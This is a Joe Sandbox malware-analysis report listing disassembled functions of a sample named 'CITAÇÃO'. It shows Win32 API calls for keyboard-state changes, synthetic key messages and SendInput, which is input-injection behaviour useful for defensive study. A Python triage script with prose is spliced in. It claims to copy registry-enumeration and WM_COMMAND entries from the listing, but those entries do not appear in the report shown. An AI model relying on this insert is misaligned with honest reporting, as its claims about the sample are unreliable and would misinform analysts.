                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00444633
                                                      • GetKeyboardState.USER32(?), ref: 00444648
                                                      • SetKeyboardState.USER32(?), ref: 0044469C
                                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
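The API lists in these entries are quicker to triage once the window-message and virtual-key constants are decoded. The Python below is an added example, not Joe Sandbox code or IDA-plugin output: it parses lines in the "Name.MODULE(args), ref: ADDR" layout used above, groups them per "APIs" heading, decodes the PostMessageW arguments seen in the two GetKeyboardState/SetKeyboardState entries (0x100 = WM_KEYDOWN, 0x101 = WM_KEYUP; wParam 0x10/0x11/0x12/0x5B = VK_SHIFT/VK_CONTROL/VK_MENU/VK_LWIN, standard Win32 values) and flags the RegConnectRegistryW/RegOpenKeyExW/RegEnumValueW sequence. The embedded sample text is copied from the listing above; the regex and the wording of the findings are this example's assumptions, not part of the report.

```python
"""Parse the 'APIs' entries of a Joe Sandbox function listing and decode the
message/VK constants.  Added example, not part of the sandbox report or its
tooling; the constant tables are the standard Win32 values."""
import re
from collections import Counter

# Copied from the listing above (the WM_KEYDOWN entry and the registry
# enumeration entry).  Other input is assumed to use the same layout.
SAMPLE = """\
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
"""

# One report line: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional "(args)," and the "ref: ADDR" site.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

WM_NAMES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


def parse_api_entries(text):
    """Return one list of calls per 'APIs' heading.  Each call is a dict with
    api, module, ref (int), args (ints, None for '?') and a subcall flag."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue
        raw_args = m["args"].split(",") if m["args"] else []
        current.append({
            "api": m["api"],
            "module": m["mod"],
            "ref": int(m["ref"], 16),
            "args": [None if a == "?" else int(a, 16) for a in raw_args],
            "subcall": m["sub"] is not None,
        })
    return entries


def vk_name(wparam):
    if wparam is None:
        return "VK_?"
    return VK_NAMES.get(wparam, f"VK_{wparam:#04x}")


def describe_entry(calls):
    """Human-readable findings for one function entry."""
    findings = []
    direct = {c["api"] for c in calls if not c["subcall"]}
    for c in calls:
        # PostMessageW(hWnd, Msg, wParam, lParam): decode keyboard messages.
        if c["api"] == "PostMessageW" and len(c["args"]) >= 3:
            msg, wparam = c["args"][1], c["args"][2]
            if msg in (0x0100, 0x0101):
                findings.append(f"{WM_NAMES[msg]} {vk_name(wparam)} posted at {c['ref']:08X}")
    if {"RegOpenKeyExW", "RegEnumValueW"} <= direct:
        note = "enumerates registry values"
        if "RegConnectRegistryW" in direct:
            note += " on a hive reached via RegConnectRegistryW (target decided at runtime)"
        findings.append(note)
    if {"GetKeyboardState", "SetKeyboardState"} <= direct and any("WM_KEY" in f for f in findings):
        findings.append("rewrites keyboard state around synthetic modifier-key messages (input injection)")
    return findings


def module_counts(calls):
    """How many calls each imported module accounts for in one entry."""
    return Counter(c["module"] for c in calls)


if __name__ == "__main__":
    for i, entry in enumerate(parse_api_entries(SAMPLE)):
        print(f"entry {i}: {dict(module_counts(entry))}")
        for finding in describe_entry(entry):
            print("  -", finding)
```

The decoder only names constants it is sure of; anything else is printed as a raw VK value so an analyst can look it up rather than trust a guess. Feeding it the other PostMessageW entries above (0x0111) yields WM_COMMAND, which the menu-walking entry uses, but that one carries no keyboard state so it is not flagged.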
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf__wcsicoll_wcscpy
                                                      • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                      • API String ID: 1729044348-3025626884
                                                      • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                      • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                      • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                      • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                      APIs
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                      • String ID:
                                                      • API String ID: 2354583917-0
                                                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      Similarity
                                                      • API ID: Window$Enable$Show$MessageMoveSend
                                                      • String ID:
                                                      • API String ID: 896007046-0
                                                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                      APIs
                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                      • GetFocus.USER32 ref: 00448ACF
                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      Similarity
                                                      • API ID: Window$Enable$Show$FocusMessageSend
                                                      • String ID:
                                                      • API String ID: 3429747543-0
                                                      • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                      • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                      • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                      • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                      • __swprintf.LIBCMT ref: 0045D4E9
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu$\VH
                                                      • API String ID: 3164766367-2432546070
                                                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 3850602802-3636473452
                                                      • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                      • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                      • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                      • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                      APIs
                                                      Similarity
                                                      • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                      • String ID:
                                                      • API String ID: 3985565216-0
                                                      • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                      • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                      • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                      • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                      APIs
                                                      • _malloc.LIBCMT ref: 0041F707
                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                      • _free.LIBCMT ref: 0041F71A
                                                      Strings
                                                      Similarity
                                                      • API ID: AllocateHeap_free_malloc
                                                      • String ID: [B
                                                      • API String ID: 1020059152-632041663
                                                      • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                      • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                      APIs
                                                      • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                      • __calloc_crt.LIBCMT ref: 00413DB0
                                                      • __getptd.LIBCMT ref: 00413DBD
                                                      • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                      • _free.LIBCMT ref: 00413E07
                                                      • __dosmaperr.LIBCMT ref: 00413E12
                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                      Similarity
                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                      • String ID:
                                                      • API String ID: 155776804-0
                                                      • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                      • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                      • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                      • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                      APIs
                                                        • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                        • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                      • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                      • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                      • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                      APIs
                                                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                      • ExitThread.KERNEL32 ref: 00413D4E
                                                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                      • __freefls@4.LIBCMT ref: 00413D74
                                                      Similarity
                                                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                      • String ID:
                                                      • API String ID: 259663610-0
                                                      • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                      • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                      • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                      • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 004302E6
                                                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                      • GetClientRect.USER32(?,?), ref: 00430364
                                                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                      • GetWindowRect.USER32(?,?), ref: 004303C3
                                                      • ScreenToClient.USER32(?,?), ref: 004303EC
                                                      Similarity
                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                      • String ID:
                                                      • API String ID: 3220332590-0
                                                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                                      • String ID:
                                                      • API String ID: 1612042205-0
                                                      • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                      • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strncmp
                                                      • String ID: >$U$\
                                                      • API String ID: 2666721431-237099441
                                                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 0044C570
                                                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$InputSend
                                                      • String ID:
                                                      • API String ID: 2221674350-0
                                                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
